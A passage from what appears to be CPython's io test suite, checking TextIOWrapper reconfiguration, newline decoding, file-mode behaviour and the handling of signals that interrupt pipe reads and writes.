t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() when the return value of the encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() when the return value of the decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode a utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig does not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin1 -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
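# Informal illustration (assuming a 4-byte native int, which is an assumption
# and is not checked here): _to_memoryview(b'abcdefghi') keeps only the first
# 8 of the 9 bytes so the length is a multiple of array('i').itemsize, and
# returns a memoryview over the resulting int array; .tobytes() recovers
# those 8 bytes.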
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
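            # Drain whatever is left: iter(rf.read, None) keeps calling read() until the
            # non-blocking pipe reports no more data by returning None.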
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
        # 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
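        # Build a payload a bit larger than the pipe capacity so the write is guaranteed
        # to block and the alarm can interrupt it mid-way.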
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
